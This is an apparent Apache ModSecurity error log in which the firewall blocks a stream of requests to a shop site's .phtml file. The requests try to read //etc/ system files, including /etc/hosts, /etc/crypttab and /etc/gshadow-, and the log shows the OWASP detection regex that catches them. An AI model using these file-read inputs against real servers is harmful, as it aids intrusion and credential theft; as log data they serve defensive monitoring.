[Fri Mar 20 06:53:15.828344 2026] [:error] [pid 7893:tid 140411699963648] [client 57.141.18.37:41350] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZCxCii7xarUs8iHZZsgAAAgU"]
[Fri Mar 20 06:53:15.961564 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.111:41356] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZC-oXxyEfFpUF8f9z4AAAAU8"]
[Fri Mar 20 06:53:16.807856 2026] [:error] [pid 7893:tid 140411733534464] [client 57.141.18.15:41380] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDBCii7xarUs8iHZZtAAAAgE"]
[Fri Mar 20 06:53:16.810240 2026] [:error] [pid 31215:tid 140411741927168] [client 57.141.18.53:41382] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDAF0L0L-SsrnPo5aWAAAAsA"]
[Fri Mar 20 06:53:17.264051 2026] [:error] [pid 9818:tid 140411725141760] [client 57.141.18.86:41390] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDV1pVZ5mVmJwsFMhbQAAAEI"]
[Fri Mar 20 06:53:17.684045 2026] [:error] [pid 10189:tid 140411666392832] [client 57.141.18.6:41402] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDTJ3M9BSuKP7CAYK5QAAAIk"]
[Fri Mar 20 06:53:17.776446 2026] [:error] [pid 11167:tid 140411590858496] [client 57.141.18.58:41408] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDfHIg5MgXLBnicPrAAAAAdI"]
[Fri Mar 20 06:53:18.122087 2026] [:error] [pid 9818:tid 140411733534464] [client 57.141.18.91:41416] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDl1pVZ5mVmJwsFMhbgAAAEE"]
[Fri Mar 20 06:53:18.324944 2026] [:error] [pid 21219:tid 140411658000128] [client 57.141.18.60:41418] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDvXLqtnMIWvjpaKMeAAAAoo"]
[Fri Mar 20 06:53:18.839163 2026] [:error] [pid 15826:tid 140411658000128] [client 57.141.18.98:41432] [client 57.141.18.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crypttab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDuoXxyEfFpUF8f9z4QAAAUo"]
[Fri Mar 20 06:53:18.995576 2026] [:error] [pid 10189:tid 140411708356352] [client 57.141.18.5:41438] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDjJ3M9BSuKP7CAYK6AAAAIQ"]
[Fri Mar 20 06:53:19.379079 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.50:41454] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/machine-id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZD_qxLDW4GITHUkTXAQAAAQo"]
[Fri Mar 20 06:53:19.927126 2026] [:error] [pid 31215:tid 140411666392832] [client 57.141.18.114:41468] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc4.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDwF0L0L-SsrnPo5aWwAAAsk"]
[Fri Mar 20 06:53:19.946986 2026] [:error] [pid 31215:tid 140411649607424] [client 57.141.18.22:41472] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZDwF0L0L-SsrnPo5aXAAAAss"]
[Fri Mar 20 06:53:21.758711 2026] [:error] [pid 21219:tid 140411691570944] [client 57.141.18.103:41492] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZEPXLqtnMIWvjpaKMeQAAAoY"]
[Fri Mar 20 06:53:21.766990 2026] [:error] [pid 9818:tid 140411607643904] [client 57.141.18.106:41498] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZEV1pVZ5mVmJwsFMhbwAAAFA"]
[Fri Mar 20 06:53:21.768011 2026] [:error] [pid 7893:tid 140411632822016] [client 57.141.18.30:41494] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZERCii7xarUs8iHZZtwAAAg0"]
[Fri Mar 20 06:53:21.768113 2026] [:error] [pid 7893:tid 140411683178240] [client 57.141.18.76:41490] [client 57.141.18.76] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZEBCii7xarUs8iHZZtgAAAgc"]
[Fri Mar 20 06:53:21.857379 2026] [:error] [pid 9818:tid 140411658000128] [client 57.141.18.89:41512] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZEV1pVZ5mVmJwsFMhcAAAAEo"]
[Fri Mar 20 06:53:22.515881 2026] [:error] [pid 15826:tid 140411716749056] [client 57.141.18.95:41532] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZEuoXxyEfFpUF8f9z5QAAAUM"]
[Fri Mar 20 06:53:22.588877 2026] [:error] [pid 15826:tid 140411666392832] [client 57.141.18.38:41534] [client 57.141.18.38] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZEuoXxyEfFpUF8f9z5gAAAUk"]
[Fri Mar 20 06:53:22.740481 2026] [:error] [pid 10189:tid 140411716749056] [client 57.141.18.122:41540] [client 57.141.18.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZEjJ3M9BSuKP7CAYK6wAAAIM"]
[Fri Mar 20 06:53:23.095838 2026] [:error] [pid 10189:tid 140411674785536] [client 57.141.18.4:41546] [client 57.141.18.4] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZEzJ3M9BSuKP7CAYK7QAAAIg"]
[Fri Mar 20 06:53:23.400802 2026] [:error] [pid 9818:tid 140411616036608] [client 57.141.18.44:41562] [client 57.141.18.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZE11pVZ5mVmJwsFMhcQAAAE8"]
[Fri Mar 20 06:53:23.811933 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.33:41572] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZE-oXxyEfFpUF8f9z5wAAAUw"]
[Fri Mar 20 06:53:24.166174 2026] [:error] [pid 7893:tid 140411557287680] [client 57.141.18.93:41576] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFBCii7xarUs8iHZZuAAAAhY"]
[Fri Mar 20 06:53:24.604628 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.89:41584] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFF1pVZ5mVmJwsFMhcgAAAE0"]
[Fri Mar 20 06:53:24.782454 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.71:41588] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/amphihelia/affable013658094084.phtml"] [unique_id "ab0ZFBCii7xarUs8iHZZuQAAAhg"]
